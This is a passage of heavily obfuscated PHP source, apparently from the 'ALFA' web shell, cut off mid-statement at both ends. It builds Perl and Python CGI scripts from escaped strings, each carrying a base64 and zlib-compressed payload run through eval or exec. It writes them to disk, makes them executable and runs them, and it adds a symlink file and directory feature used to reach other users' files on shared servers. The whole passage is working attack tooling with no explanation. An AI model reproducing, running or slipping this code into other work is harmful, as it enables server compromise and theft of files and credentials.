alfacgihtaccess("\143\x67\x69"); $perl = "\x23\x21\57\x75\163\162\x2f\142\x69\x6e\x2f\x70\145\x72\x6c\x20\40\x20\x2d\x49\x2f\x75\163\x72\57\154\157\x63\141\x6c\x2f\142\x61\x6e\x64\155\151\156" . "\12" . "\165\163\145\x20\115\111\x4d\x45\x3a\x3a\102\141\163\x65\x36\x34\x3b\165\x73\145\x20\103\157\x6d\x70\162\145\163\163\72\72\x5a\154\x69\142\73\155\x79\40\x24\x61\154\146\x61\137\x64\141\x74\141\75\42" . __ALFA_DATA_FOLDER__ . "\42\x3b\145\x76\141\154\x28\103\x6f\x6d\160\162\x65\x73\163\x3a\x3a\132\154\151\x62\x3a\72\155\x65\x6d\x47\165\156\x7a\151\160\x28\x64\x65\143\157\x64\145\x5f\x62\141\163\145\x36\64\x28\42\x48\x34\x73\111\101\x41\x41\101\101\101\x41\101\57\x35\x30\131\x65\x31\x50\124\x53\x50\171\x72\114\114\x46\156\105\161\x56\65\126\x42\x42\x73\62\147\113\x48\x34\x6a\x6d\x6a\x63\151\120\x6f\x50\65\x54\162\x62\114\114\x62\x4e\x70\111\155\x75\145\172\x32\132\141\155\x66\x2f\130\x37\x37\123\x42\161\147\x6f\x48\x4f\x5a\111\x64\63\116\x2f\x74\x37\166\132\x63\x6f\157\151\x72\x4b\125\143\x5a\170\171\x39\117\x46\151\x63\120\x72\x2b\x41\53\x72\x32\60\x41\x35\x64\x78\x49\167\x7a\x31\x44\x6a\65\70\x76\67\x62\x6c\x58\x63\144\x54\x4a\141\x6f\115\127\x76\65\161\x49\x73\115\x51\x32\61\x43\x74\131\x36\x48\x79\x46\x4a\64\116\x6c\x72\x6c\122\121\170\x6b\152\x4e\115\163\65\124\124\x6c\124\142\67\115\141\x52\x74\170\x75\x75\x44\165\155\105\x2b\123\x66\x74\160\120\117\x32\114\122\66\64\x77\x70\112\x72\60\x4f\152\63\154\x43\145\x36\x63\x5a\157\x51\x53\x46\123\63\124\171\70\145\167\x45\x58\x64\x4b\x54\x54\170\61\x58\156\x58\x51\x59\130\70\x49\120\130\x67\153\123\124\x55\x4b\152\162\115\x41\70\x7a\164\x4a\62\155\x71\x55\x30\x57\110\144\143\144\x64\x35\x78\x46\142\x6b\167\111\60\163\125\x6a\x71\x49\x73\171\131\161\165\x2b\143\x79\124\152\71\x6b\172\101\151\127\x57\62\x53\x48\x78\x44\x45\x6d\125\162\x70\106\152\121\165\x4a\x30\61\120\x61\71\x66\x42\105\105\x45\x31\x79\x4d\64\x72\121\132\x5a\x70\170\156\105\x2f\125\164\x7a\101\160\x43\x69\x37\x61\x66\x4c\x78\x44\x42\x62\x41\x77\x53\120\150\166\x4b\112\65\x44\60\x32\67\x41\x54\x35\101\115\160\x47\x6b\x37\151\125\x64\x71\x4f\121\107\x64\x61\102\x45\120\x51\x76\x6a\x6d\156\x38\x57\152\115\62\62\107\127\x45\120\x57\x42\170\x54\71\x6f\x75\57\125\x61\113\102\x73\142\152\126\155\x57\125\115\x51\167\x51\143\71\x52\156\x4d\65\151\106\157\x65\167\x2f\x34\153\165\154\x70\x4d\x6b\x54\155\57\x51\x6e\60\x76\x30\116\171\x32\x53\x6a\147\x75\x43\71\70\170\147\x54\x52\116\x47\126\x39\x6f\x4e\x6c\x57\145\125\x4a\170\157\x34\x47\145\x49\102\167\x52\x77\x37\150\150\165\x4e\131\x72\106\x31\152\x57\104\x4e\x70\151\x47\121\110\x75\x43\x69\167\x45\165\x30\101\x73\144\132\147\117\57\x74\x4e\x6d\141\53\x5a\x77\x50\x61\x38\x55\x41\64\70\64\53\132\x50\x34\124\x4e\102\117\144\157\x31\122\x67\x49\57\x2f\164\x72\x64\x43\167\x41\x67\x34\114\x79\141\132\105\x69\123\x38\x55\x44\111\x50\x76\x44\154\125\102\x65\x32\x2f\141\x52\x33\57\x59\125\x67\x33\x78\x4f\123\164\x71\x76\116\144\126\x34\x61\117\x33\157\x73\x46\150\x70\107\153\114\x77\x59\x41\x30\110\x41\111\x58\157\x76\70\147\x67\143\x55\105\152\142\154\121\x41\150\152\166\x4f\x4a\x74\122\x64\124\x52\x6b\x74\61\155\64\53\x44\132\115\64\x47\157\150\x34\105\x59\x6f\x41\130\x70\115\x43\x43\117\x57\122\155\x2b\111\112\112\121\66\x45\67\144\102\101\x7a\x35\x2b\152\x4a\x74\110\146\x5a\x2b\x41\110\172\103\x68\172\x66\65\120\x6d\115\143\x75\124\x6d\x49\x50\101\70\x74\x64\171\53\x36\66\67\151\170\162\166\x50\156\71\x62\x47\127\57\120\x54\67\x39\53\145\x76\x66\65\143\x76\x44\154\x2f\x50\x7a\123\x57\116\x73\161\x35\147\70\101\116\x73\71\171\x70\x42\x43\x44\x32\x6c\113\x7a\53\65\67\x46\161\127\x57\x34\x78\161\67\53\142\152\163\147\147\127\132\165\x49\x41\x63\157\x4b\x49\164\116\x38\101\x33\x6c\122\127\155\60\x50\x65\101\x36\x6f\53\x4c\x6c\x48\x34\162\x33\166\152\x61\151\x54\161\x63\x4f\x51\113\161\x77\x4e\122\x39\107\155\167\x6c\x70\x42\114\105\166\x59\147\171\126\153\x58\x38\107\x6a\53\x64\x44\65\x41\x50\x44\120\143\x66\x6f\165\x4f\x49\x55\x30\153\121\101\143\162\x4b\106\x56\x6b\x4b\110\x58\106\x44\x43\x61\106\x7a\121\x59\x64\143\x30\x48\112\x43\x4b\123\x69\144\144\110\131\156\x6e\x32\x6b\102\x48\x79\120\x79\x4f\x5a\x35\150\106\122\x5a\172\x7a\116\x6b\x35\x6f\x77\123\x31\x6a\104\164\126\104\x56\111\65\150\x6e\102\x4a\x45\163\x67\155\x4f\x55\x38\x64\x78\104\116\164\x73\111\63\120\x4d\145\x64\65\62\130\x52\x4f\105\x6f\114\132\152\155\x49\x68\104\154\x6c\x48\145\116\x51\x64\150\x67\164\x4d\142\x38\65\x37\x51\x6e\156\x66\123\x61\x6e\154\x4b\x61\106\157\124\x47\154\145\x43\142\x39\x48\x79\67\105\x77\150\53\111\143\120\61\x4b\170\x72\x41\x7a\156\151\x47\x43\111\x6c\155\x4d\x6f\163\x56\x36\170\172\x53\103\62\x48\x4c\x37\147\x34\x33\157\x65\x73\x2b\132\127\x41\131\106\x4e\x5a\x54\x33\122\62\x50\x68\x44\x51\x35\x55\x56\120\x5a\x78\172\x4a\102\x73\104\x70\146\153\67\x49\105\x50\112\x66\x69\x52\x69\141\105\x2f\154\144\x66\104\161\x65\x2b\146\166\167\x79\x64\x4b\142\x71\x4c\x5a\x2b\126\x61\60\x62\115\167\112\162\130\65\x4f\101\x70\x61\145\x57\142\x7a\x5a\x4c\x62\x37\x50\60\106\125\x51\164\61\127\x54\x47\x51\x46\141\x6f\131\70\106\104\x66\x77\x71\171\x6e\x45\x4a\66\105\x30\53\x34\x6a\165\60\151\x38\61\66\103\x6d\124\142\x4b\151\x67\161\156\124\104\x41\152\x30\106\112\x33\x4e\107\111\166\151\x4a\111\x4d\127\157\156\x65\x4b\164\141\x41\x49\63\150\130\x53\x43\x56\x37\x49\x62\122\65\x4e\62\106\x4e\x4b\121\143\125\x42\x4b\121\x61\x54\x57\164\x58\101\x53\x72\x65\102\x31\x4a\63\172\142\x4b\x67\x6f\156\121\130\x45\165\162\x4f\165\145\112\65\143\x4a\x66\x4c\104\x42\144\x4b\x6d\x36\143\65\53\x4c\x2f\147\x34\x4a\143\143\x64\x73\124\107\x58\x69\x6b\156\121\104\x6d\x44\102\x36\x72\x79\164\161\x4b\x32\61\142\x43\x7a\x75\x4f\x42\124\x6e\114\147\161\126\x62\112\x35\123\x67\164\x57\x6d\146\151\117\105\x45\71\142\61\x74\x64\141\110\164\x61\x63\x58\x6a\117\x72\x35\x76\113\x6b\x7a\157\145\x61\127\67\122\126\x34\x38\117\116\x53\121\71\114\130\141\121\144\x48\x77\x38\122\x49\155\126\x52\102\x44\166\171\x75\x4a\x52\144\x62\x71\x72\x32\x35\127\156\x4c\x36\145\x30\x62\x76\x61\60\125\x71\53\112\x58\143\114\126\x79\172\x4e\151\x38\64\x71\160\62\152\x31\x68\x4d\110\x66\x59\103\x34\x51\157\111\126\162\125\61\x67\x67\61\x6c\x58\x55\x39\61\x45\125\104\166\151\x69\111\162\122\x4c\156\123\x6f\x6c\130\154\x46\157\163\62\x72\x41\x61\x41\162\x75\155\142\x5a\x63\x45\x4d\143\x58\121\x7a\x4b\162\112\x70\x53\x70\x70\66\102\154\x41\x6a\x68\150\x34\146\x32\x68\x37\103\x55\65\x37\x4a\151\x71\x7a\x6e\155\x2f\x39\x5a\164\61\70\70\113\107\126\x62\x4b\53\126\x62\107\x55\124\x73\x61\x65\x43\171\x53\156\x36\x46\110\x76\x52\x4c\60\x4f\x30\x46\162\151\170\165\x38\116\x4a\66\x69\125\153\x4c\141\154\61\152\x49\145\60\x2f\172\x43\x42\53\x6f\162\105\115\x4d\153\x43\x6b\171\102\x49\x65\163\126\143\x52\164\116\65\x63\x42\66\x65\x63\125\143\123\x68\63\x75\120\141\112\x4f\155\124\x63\160\x52\70\125\113\71\x30\x78\153\106\x51\x53\115\114\x64\156\62\152\151\117\151\53\117\x66\x73\104\x38\x68\x77\167\x4c\x56\162\141\x42\x56\155\x35\x51\x4d\x76\x43\61\x4a\66\x30\x36\x52\x31\165\x67\115\x64\x63\150\x6f\x65\165\117\x71\153\x41\x4c\x4a\122\x39\x67\x6b\131\x4a\x72\67\157\x77\x6c\151\x6a\x65\66\x76\x55\130\x6c\154\x31\x6f\106\x71\x79\x4d\67\x47\161\x6a\143\x4f\150\125\61\160\x5a\141\x4d\x77\156\x75\104\151\x65\150\126\131\141\103\x47\107\121\x45\151\x77\61\x30\x59\x41\x78\160\x50\120\160\x2f\x47\170\114\112\147\x46\x75\x65\127\x50\114\x4f\x76\x39\161\65\164\162\x5a\111\x69\x72\x4e\x61\161\141\x39\x44\116\x34\116\x49\x57\143\x34\x76\125\x4e\144\104\x6b\64\111\x65\x71\66\126\x41\x5a\121\x6d\172\71\x61\62\130\x69\116\x35\x4b\160\62\x43\x76\x4c\57\116\x4e\156\x4c\x32\x2f\150\162\x79\110\163\x55\70\x66\x33\112\142\x36\x67\163\x78\x30\167\162\x44\107\161\127\x31\102\x6e\130\x6d\x6b\x74\x65\x74\x57\66\x52\150\62\x30\67\63\155\x6c\x66\x54\x52\x75\x4e\x56\x79\x6f\144\156\x64\121\155\x38\124\127\141\150\141\104\x64\151\x6c\x56\111\x69\127\156\57\127\x76\x6f\61\x4d\x4b\x4b\x42\x30\x4b\66\x30\x70\154\64\x71\x7a\x4e\x46\x6a\106\123\x69\127\x42\x73\161\x72\x33\x52\x45\66\x4c\154\115\64\x49\x76\x41\153\106\150\x45\x44\x4a\x54\x33\71\106\x42\x65\71\x73\162\x47\163\151\x65\114\125\172\63\x6f\157\145\122\x42\x79\105\x64\x33\x49\162\x35\126\103\63\x42\143\x69\62\53\x69\x72\122\x49\x39\x46\x73\172\103\117\123\60\x56\172\x4a\x5a\x43\x62\x66\x68\x61\64\x4c\x35\172\62\62\x2f\127\147\x74\x69\x72\x59\x47\x64\122\x42\x51\170\171\x33\111\145\127\x77\103\60\101\154\x67\61\x6e\153\105\101\170\67\x79\x4a\64\152\57\x68\x59\x57\x73\71\107\124\x54\126\x62\126\x43\115\x48\x59\x4d\x41\143\167\63\147\x68\172\63\x65\122\102\x37\66\157\153\107\x31\150\x6e\x4f\x72\64\x77\x61\154\x55\x73\x4c\170\x7a\127\x48\62\x67\x4b\x52\62\x4a\x48\144\103\x6a\x53\150\101\65\57\x31\x71\x4e\x68\124\150\x53\x62\x51\156\114\x4e\167\x46\x33\x4c\61\x36\x2b\x44\x4c\x53\x64\x2f\123\x43\146\163\162\x46\x56\157\x77\106\66\x69\113\x36\x72\103\70\x4d\x65\x4f\107\x56\x44\x71\x6f\x71\156\x4c\121\122\x31\66\152\x77\155\107\x67\x54\x6b\x64\x75\110\70\x63\101\165\x78\x42\x30\x49\x42\116\x6e\101\x6f\x47\64\x69\162\x43\x69\124\70\x69\153\64\151\150\x73\114\x31\x35\x41\142\66\161\61\x57\x66\x51\x55\x46\111\x37\x32\102\57\130\64\x39\x33\166\x6f\x79\x58\x5a\x2b\160\x6d\103\120\145\x2b\103\x33\x45\x7a\166\x4a\x41\63\167\167\x2f\x6c\172\142\x43\146\x6e\165\x66\151\53\x73\166\x67\105\x36\105\x4c\171\164\102\132\x6c\x69\124\x5a\x48\x4f\x72\x31\x52\171\x44\x49\53\x75\154\142\117\130\x78\153\170\126\x49\103\x79\x4f\165\154\x78\x6e\x56\x79\x75\x50\x54\60\60\x78\x4e\103\114\x75\x46\123\x72\x75\x37\153\x65\x51\114\164\x41\x2b\x58\152\x58\120\172\x74\x49\x51\107\x52\x49\x48\x67\x68\144\126\x6b\110\x32\114\x39\167\x53\x6d\x44\121\x2f\167\x31\x77\110\145\154\x44\x4e\x55\57\103\x41\x72\172\122\101\x78\x58\166\124\x4e\63\117\155\117\x4d\x6f\157\157\x79\126\126\x33\111\111\x33\x2b\x46\141\141\161\70\156\x42\x55\x46\x42\121\x36\x74\162\x31\117\x4e\x54\165\x77\172\x53\156\x65\160\x4f\x75\107\x32\171\x67\162\x52\x58\153\67\x68\126\x4e\x68\x52\144\124\115\x75\166\x35\x62\101\x6d\125\x36\x53\x38\162\x6c\132\145\61\105\x36\x55\57\x37\105\x41\x48\57\64\x48\65\145\110\113\146\123\x73\122\101\101\101\75\x22\x29\x29\x29\x3b"; $py = "\43\x21\57\165\x73\162\x2f\x62\x69\156\x2f\160\171\x74\150\x6f\156" . "\xa\x69\x6d\160\157\x72\164\40\172\154\151\142\54\x20\142\141\x73\x65\66\64\xa\141\154\146\141\137\144\x61\164\x61\75\47" . __ALFA_DATA_FOLDER__ . "\x27\xa" . "\x65\166\141\154\x28\143\x6f\155\160\x69\154\145\50\x7a\154\x69\x62\56\144\x65\143\157\x6d\x70\x72\145\163\163\x28\142\141\163\x65\x36\64\56\x62\x36\x34\144\145\x63\157\x64\145\50\42\x65\x4a\x79\144\127\116\x31\x7a\x34\152\147\123\x66\172\132\x2f\150\x64\132\x54\127\x63\x4f\107\62\112\x43\x36\166\x51\144\103\62\x4d\162\x4e\x54\x4f\x36\x6d\141\x6e\146\x6e\66\151\142\67\x6c\x46\x41\x75\131\121\166\x77\x6a\162\x46\143\153\147\151\167\125\63\116\57\53\x33\x58\x72\x77\x78\142\x67\132\113\142\x4f\104\61\151\x57\x2b\154\x76\x64\x50\x37\x56\x51\x34\152\104\x70\105\x58\x69\x4b\x54\143\62\x46\111\x74\x6d\161\x55\101\163\x39\157\x55\x63\x78\x71\x2b\x69\x69\x5a\120\61\102\152\x2b\x30\x7a\126\161\164\112\x4c\x36\x69\x70\x6c\114\62\x65\x4a\126\146\x46\x68\162\x6b\170\154\x32\64\x6b\104\x38\x31\121\x4e\115\x76\61\x4c\165\57\x31\x56\x69\126\x66\60\104\113\106\115\142\x6b\154\131\145\x69\x2b\x74\x36\x49\60\63\x78\x38\53\160\127\57\x2f\53\x51\110\107\71\x37\x53\125\162\113\x65\143\144\x55\144\x38\x49\104\x36\x6d\131\166\130\70\117\112\x37\x37\x69\x30\141\x49\x56\113\112\x50\x79\171\126\116\x63\x36\x72\x6f\x67\106\171\123\x4d\x41\x46\x50\143\103\x59\112\x47\171\145\x51\x71\61\110\x31\x49\x4c\x61\163\61\70\166\132\153\x71\x79\131\x51\150\130\71\x6d\163\x73\102\145\x46\x6f\x73\x47\x79\112\162\105\x45\x77\107\x67\x71\155\x74\161\x44\171\114\116\103\107\x77\111\106\127\x59\x46\x34\112\154\x4b\151\122\x63\153\104\x36\x58\143\125\63\x56\x4f\x69\67\x6b\x73\x6f\x41\x59\150\147\x6c\124\127\x56\x4c\122\x44\143\166\152\x6a\106\146\114\143\105\102\x6f\x6c\x5a\117\127\x43\156\147\x74\x30\124\x4d\164\103\171\x71\x5a\x54\115\x4c\x42\167\x4e\x4d\132\x4a\x6d\165\53\x59\143\155\130\x72\x57\x54\151\x61\61\x4a\166\106\x32\127\x52\x70\127\x75\x31\113\143\x47\61\101\x4c\x6a\x42\102\102\124\x48\161\x75\144\103\70\x4f\x6f\x78\146\120\x66\x78\67\x52\53\57\x76\x66\x2f\x39\x49\146\x33\120\170\64\x38\x50\x34\x54\x79\x57\144\126\153\157\x55\102\x45\x4f\131\x42\163\61\116\172\x41\x67\130\x31\172\172\107\x76\131\64\x38\x4d\x64\117\65\64\126\x30\x43\151\71\x6b\x53\x43\64\111\70\x73\144\x2f\70\161\114\161\111\x2f\126\147\x53\111\171\x6b\147\121\x6e\150\x68\156\65\x6d\163\101\x4d\x5a\63\x31\132\161\x53\x48\113\53\x6f\125\x55\x31\x4a\x4d\x67\x2f\112\116\x6b\165\122\x32\57\127\x53\164\x57\x34\62\x2f\151\145\x4a\x45\x6c\x34\x69\x56\164\x6d\113\x41\143\66\x6c\155\141\x73\x77\x2f\x6e\x34\x43\172\x37\172\105\111\x4e\x67\53\141\x49\57\x36\124\117\126\155\123\150\x67\x49\x32\156\112\x42\104\151\x30\x59\171\123\x6a\x6c\123\114\114\x41\165\112\160\x75\117\x4d\64\x44\147\143\x52\x75\103\153\x4b\127\101\x69\x6e\x53\153\102\x6d\110\105\160\x32\x47\x79\x6d\62\126\61\143\121\x33\61\x55\61\171\x56\x69\154\x6d\x4c\x69\x4a\132\154\x4f\126\x7a\x36\132\x4c\104\x70\121\132\x4c\67\155\64\x6a\144\67\x63\x77\x7a\115\x61\122\172\x4e\152\x6e\130\x5a\x6e\x63\102\154\117\105\171\123\141\124\122\x4f\x6b\x56\63\x6d\x48\171\x4a\111\x74\106\x51\x71\153\132\x43\x33\131\70\x6a\x59\x79\57\107\147\66\x73\x45\144\105\x51\144\64\171\x64\x52\165\x6c\151\x35\112\x57\x6e\66\115\x54\160\141\120\122\x33\x66\130\x31\x79\103\155\61\111\146\107\x30\60\153\x5a\172\150\67\130\x33\71\64\64\122\157\x33\61\x75\67\x4b\x6c\x4e\x62\x64\x55\101\114\x64\x61\110\120\x47\x7a\113\x6f\x76\161\x63\64\114\x67\x2b\62\x4b\71\x59\x37\x5a\x57\x4e\x41\x65\172\x65\x5a\132\x68\70\171\x77\143\111\107\x7a\172\122\x37\x4a\120\150\120\x37\115\71\125\x57\x49\x47\62\x61\161\x54\112\145\145\x70\126\145\116\113\x62\x6e\117\x77\x4e\x65\66\130\131\151\53\101\63\125\60\x46\157\x33\155\x71\161\70\x66\x56\142\x46\x44\111\x46\x44\x4a\144\142\127\x6e\132\x54\104\61\x54\x30\122\101\132\x44\x41\154\x4d\110\120\x6d\165\131\x72\x70\x41\x37\x43\x77\124\x41\155\161\x30\x2b\x58\121\70\x6a\x2f\x4e\145\101\101\131\x78\x61\x63\x66\65\x41\164\63\115\120\x70\x65\x46\126\110\x62\x4b\x71\x33\142\116\x70\132\120\172\x79\x42\121\x72\70\71\x78\x73\x74\x36\x42\x78\x4c\x51\x67\141\124\142\x78\x6d\x56\121\x63\x2b\x78\x4d\151\163\141\x62\x41\x67\x41\64\x4e\x65\65\114\x31\x2b\x46\142\172\x53\111\x70\x79\157\x56\160\x61\x4d\60\x64\x68\x4f\115\x45\110\x43\x54\151\155\164\x6d\x47\64\65\105\x46\132\152\155\132\105\122\x48\115\x58\x5a\x52\120\65\x46\x30\x55\62\157\x44\x52\60\x72\172\x2b\106\171\x38\156\x70\x4d\142\107\x51\x54\x66\171\x66\x50\x6f\x6e\117\x36\x7a\71\x61\x71\61\x34\x50\155\130\104\x67\x50\155\154\130\x35\127\x73\x77\x36\71\x39\167\120\132\x53\120\71\165\67\x62\63\x78\x66\x69\71\155\x45\131\156\x6b\131\x57\x34\66\147\154\153\117\x30\x6e\x76\x51\x41\x65\x63\150\110\150\64\67\x2f\x4c\x77\x4a\x6e\x67\x39\64\x4a\x62\x73\165\170\114\167\132\x52\x73\163\71\x74\157\x53\112\x2b\71\x78\x48\x6e\x45\132\143\70\x43\x63\x70\x51\x30\66\131\65\116\x42\106\x6c\172\x6b\x44\x44\102\x6b\110\x44\x6c\x67\x58\125\x44\154\x72\x51\123\x41\142\63\x36\154\70\127\130\x79\132\x71\x53\x66\155\x77\61\147\x55\x46\106\116\x52\x6f\x52\x75\x46\144\x63\101\x76\x67\x5a\x4c\x5a\57\x38\63\x7a\x50\x39\x30\102\x70\141\x64\x77\120\170\x4f\160\65\x68\x38\x6e\144\x69\x42\x38\x52\70\x41\167\71\x38\x6b\67\121\x5a\114\x42\65\124\167\131\x2f\61\x61\x38\x50\171\x41\x75\x42\156\x73\x49\144\x52\x6a\x65\x43\x38\150\x36\114\147\172\102\105\65\113\x76\x55\x50\116\130\x67\x49\102\x76\155\x49\101\x37\x61\x49\62\155\125\130\x7a\x58\104\x41\x70\x37\121\x72\x4f\x36\x44\x4c\x42\x6a\110\152\70\101\x5a\x38\x35\x69\x67\x34\x41\64\x6c\120\106\x4e\x72\x58\160\170\x54\x44\x44\165\66\x42\x4f\x54\x33\166\x31\67\x2f\126\107\70\x45\150\x47\122\142\x59\107\103\x51\x49\163\x30\x4f\116\53\106\x50\x2f\x30\171\61\x38\143\x44\x41\166\x37\x4d\x42\x71\105\x35\105\163\x30\x31\111\132\x59\114\x41\106\170\x68\x74\113\113\70\x4d\x77\61\70\172\x48\155\121\116\x30\x66\x57\63\x72\127\x61\x67\x75\x67\153\x6c\x52\122\117\146\x78\160\106\61\x6f\122\x64\147\x53\x70\x58\x41\117\x51\121\170\163\x57\65\x34\x74\167\x43\101\x34\x61\141\144\x69\141\x6f\123\120\157\70\172\x46\143\155\156\142\110\163\152\165\57\x54\63\157\x36\x78\x7a\x32\x77\x61\164\166\141\142\x79\111\x4d\x70\61\147\115\x70\61\155\71\x32\x78\131\65\164\157\122\123\x55\x64\x58\171\167\127\143\x4b\103\64\117\x34\63\165\154\x34\x57\147\x2b\x37\147\145\102\x46\x62\57\x33\x35\x64\150\x6f\x37\64\x43\131\x5a\124\x4f\163\x33\163\126\66\104\112\x32\x42\101\63\x2f\124\x49\125\x33\114\144\111\141\144\x78\101\x49\153\145\122\57\120\145\143\x56\152\61\x37\x48\152\165\x70\x50\156\x67\141\x34\125\144\70\131\57\156\x66\152\66\145\103\122\157\144\114\x33\164\x35\132\66\106\x6f\60\161\121\x4b\111\x49\141\62\53\57\x46\66\x6a\x71\x62\57\x50\102\x70\x31\x52\163\146\124\x30\110\123\122\132\161\x48\x70\146\x45\62\x7a\64\125\x4c\172\116\130\x46\156\x6d\61\x38\x47\106\x79\x34\x50\x6a\x4d\x36\x66\65\66\67\x66\x42\131\x38\x73\165\126\143\157\x50\65\x77\x61\x37\x49\155\171\x32\x70\157\60\116\x45\60\61\x5a\x4b\x4b\x4f\153\65\106\x6c\122\x5a\60\101\120\x74\x34\123\124\163\x4b\102\71\64\166\62\x2b\112\156\x59\x54\113\x37\x79\64\x2b\x4e\102\147\x34\x52\117\142\147\101\112\114\x63\163\x37\x6d\x49\101\121\x58\70\x66\142\125\161\125\x59\164\x71\142\x2b\x4f\x36\170\x78\167\x61\x37\x53\x37\x36\x31\x30\x6e\x65\x65\x57\x43\x38\x51\x35\122\x69\145\157\x31\145\154\127\x54\163\x72\x64\143\x6d\155\151\x51\160\x4c\146\121\x58\67\104\145\67\114\156\155\x42\64\x6e\x55\146\x48\154\x4e\57\125\x6c\x57\x70\125\x34\141\x44\x66\154\x4b\150\171\x47\53\x74\x68\172\x57\x4b\x47\57\x76\x58\170\117\x6f\x57\x79\x77\x70\161\x42\x34\x7a\x4c\x36\122\113\167\x33\110\x38\x4a\x7a\62\x69\x51\x34\170\x6b\117\170\x78\x4e\107\156\x59\x35\x37\151\x52\x78\x6f\113\x6a\x61\127\x64\x76\166\152\103\x4a\x42\63\154\63\131\132\121\115\162\132\x31\145\106\x49\x45\111\x39\x72\122\x52\x32\121\x54\x6b\x4f\102\x36\102\166\x59\x37\164\156\121\x53\x62\142\146\x6f\x75\x70\x68\120\x54\151\144\171\124\x79\x31\x76\x6e\x53\112\164\112\124\127\x66\156\x65\x52\146\x54\107\x68\x71\106\x76\112\70\x76\x6d\x6c\160\x31\71\115\143\156\x51\141\165\67\x4b\143\103\130\61\114\146\x61\120\146\x54\x71\103\111\x4f\x74\66\125\141\x78\x69\131\x4c\146\157\x33\143\x42\x57\x57\x75\111\65\130\57\x42\104\x43\70\107\x76\x73\150\x6a\150\x31\63\x4c\153\160\x67\x6a\x47\x64\x37\131\x75\x38\x44\x52\x44\110\x63\141\163\103\152\126\x56\x5a\113\x6d\x75\154\152\x54\106\105\105\170\124\122\x45\x4d\166\114\x38\x54\x76\115\67\156\114\x64\x67\x4a\63\143\155\126\x4f\x74\x52\x73\x51\162\102\156\123\x66\101\x2b\x2f\x31\x51\x39\x56\126\115\143\172\113\142\x32\x2f\103\70\125\113\x48\156\x4c\x4d\x63\171\x4c\101\67\156\67\71\146\66\x4f\x50\114\x43\67\x33\60\103\x39\x58\160\156\x71\162\155\x64\107\166\x2b\151\62\x4a\62\143\132\106\x31\x51\146\x48\x42\x56\125\171\x38\x33\x58\141\x57\x4c\127\x70\64\x6b\122\150\x36\x61\x54\x78\x61\160\x74\x62\60\167\142\105\152\141\107\122\144\117\x38\x65\114\x61\x74\106\x47\x42\117\x6e\x68\146\x56\x61\152\x49\x65\x31\146\163\x62\62\63\x70\x64\114\x62\150\x53\x66\107\120\x6d\x54\117\x4d\x32\x47\144\144\x37\121\110\x4f\x35\x42\x68\x76\146\114\120\x56\172\x59\67\x75\x32\x35\126\112\63\x62\x65\x63\71\107\x66\131\67\126\x7a\164\127\162\x4e\132\x71\163\165\x42\154\142\151\132\x6b\x38\122\145\x62\130\x50\70\144\112\x49\x65\x74\x7a\x35\x4a\x44\x69\x79\150\160\x54\156\66\105\120\130\x38\165\132\x49\x45\164\x34\63\53\112\x62\x5a\x33\x49\120\x77\x37\153\x33\x77\x65\61\65\x74\x55\60\101\x64\116\156\143\120\127\63\132\x7a\x45\145\165\x51\143\x4a\x75\71\x77\x50\x78\x59\x5a\143\151\123\x58\170\x4c\162\165\x36\164\x6f\105\103\125\167\x54\x2f\x7a\165\x68\x48\63\x6d\112\153\106\x37\x4d\x31\x33\x67\x74\117\x56\160\170\153\x63\63\x30\x4e\x45\x32\x77\160\172\x6d\x2f\x4f\x6d\155\x36\164\x61\112\x62\132\x6f\53\x69\x4e\x38\121\145\x73\57\x59\124\53\146\116\x4c\53\146\110\104\x2b\x50\x46\125\146\x39\x58\153\x76\x59\123\160\x6e\145\62\152\114\67\63\154\x5a\70\x68\60\x34\x2b\x53\165\111\154\105\x2f\126\117\63\x31\150\64\x75\x4b\x67\x43\130\122\x51\114\x47\x39\x63\x51\70\x49\70\126\130\x64\x35\x2f\147\x44\x4a\132\x48\111\x4a\125\101\x7a\x71\x6f\61\x37\130\102\x4a\x4d\112\146\57\104\x6a\x62\x36\121\62\123\121\x61\60\x2f\x34\x4c\x44\160\131\x52\x6a\x2b\164\166\x6b\x6d\102\171\142\65\160\x6f\x51\x4f\66\x63\x41\x49\110\x65\x58\117\157\171\x62\145\103\143\x4b\x78\x66\160\165\x78\143\170\154\112\x5a\146\x34\57\62\x47\166\x71\x33\61\66\67\x58\x70\63\104\x43\x66\x65\x58\x77\x56\x68\145\170\x46\154\130\x63\166\x32\124\147\156\x72\x70\x32\63\x55\105\x4f\70\x6d\57\x72\63\x44\x5a\103\x46\125\124\x30\60\x72\x64\63\x45\x77\x4b\123\x74\x59\104\150\x65\x47\x43\x2b\x6a\146\x63\x51\60\113\x78\65\x4a\x69\113\167\x42\x43\57\x67\x65\x6a\102\x6d\153\153\42\x29\x29\x2c\47\x3c\163\164\x72\x69\156\147\x3e\47\x2c\47\x65\170\x65\143\47\51\x29"; $cginame = "\x73\x79\x6d\x70\145\162\154\x2e\141\154\x66\141"; $source = $perl; $lang = "\160\x65\x72\x6c"; if ($_POST["\141\x6c\146\x61\62"] == "\x73\x79\x6d\160\171") { $cginame = "\x70\171\x73\x79\x6d\154\x69\156\153\x2e\x61\x6c\x66\x61"; $source = $py; $lang = "\160\171\x74\x68\157\x6e"; } @__write_file($cginame, $source); @chmod($cginame, 493); echo __pre(); $resource = alfaEx("{$lang}\40{$cginame}\40{$sympath}", false, true, true); if (strlen($resource) == 0) { echo AlfaiFrameCreator("\x63\147\151\141\154\x66\141\57" . $cginame); } else { echo $resource; } } if (isset($_POST["\141\154\146\x61\64"]) && $_POST["\x61\154\146\x61\64"] == "\x53\x79\x6d\x46\x69\x6c\145") { if (function_exists("\163\x79\155\x6c\151\x6e\x6b") || _alfa_can_runCommand(true, true)) { AlfaNum(9, 10); echo __pre() . "\xa\74\143\145\156\x74\145\162\x3e\74\x70\x3e\x3c\x64\151\166\40\x63\x6c\141\x73\163\x3d\42\x74\x78\x74\x66\157\x6e\164\x5f\x68\145\141\144\x65\162\x22\x3e\x7c\x20\123\171\x6d\x6c\x69\156\x6b\x20\106\x69\154\x65\40\101\156\144\40\x44\x69\x72\145\x63\164\x6f\x72\x79\40\174\x3c\57\x64\151\x76\x3e\x3c\x2f\x70\76\x3c\146\x6f\162\x6d\40\157\x6e\x53\165\142\x6d\x69\x74\75\42\147\x28\47\x73\171\x6d\x6c\151\156\x6b\47\x2c\156\165\154\x6c\x2c\x6e\165\154\154\x2c\x6e\x75\154\154\x2c\x6e\x75\x6c\154\54\x27\x53\x79\x6d\106\x69\x6c\x65\47\54\x74\150\151\x73\56\x66\151\154\x65\56\x76\141\x6c\x75\x65\x2c\164\x68\151\163\56\x73\171\x6d\x66\151\x6c\x65\56\x76\x61\x6c\x75\x65\54\x74\150\151\163\56\163\171\x6d\x6c\151\156\x6b\x2e\x76\x61\x6c\165\x65\x29\73\x72\145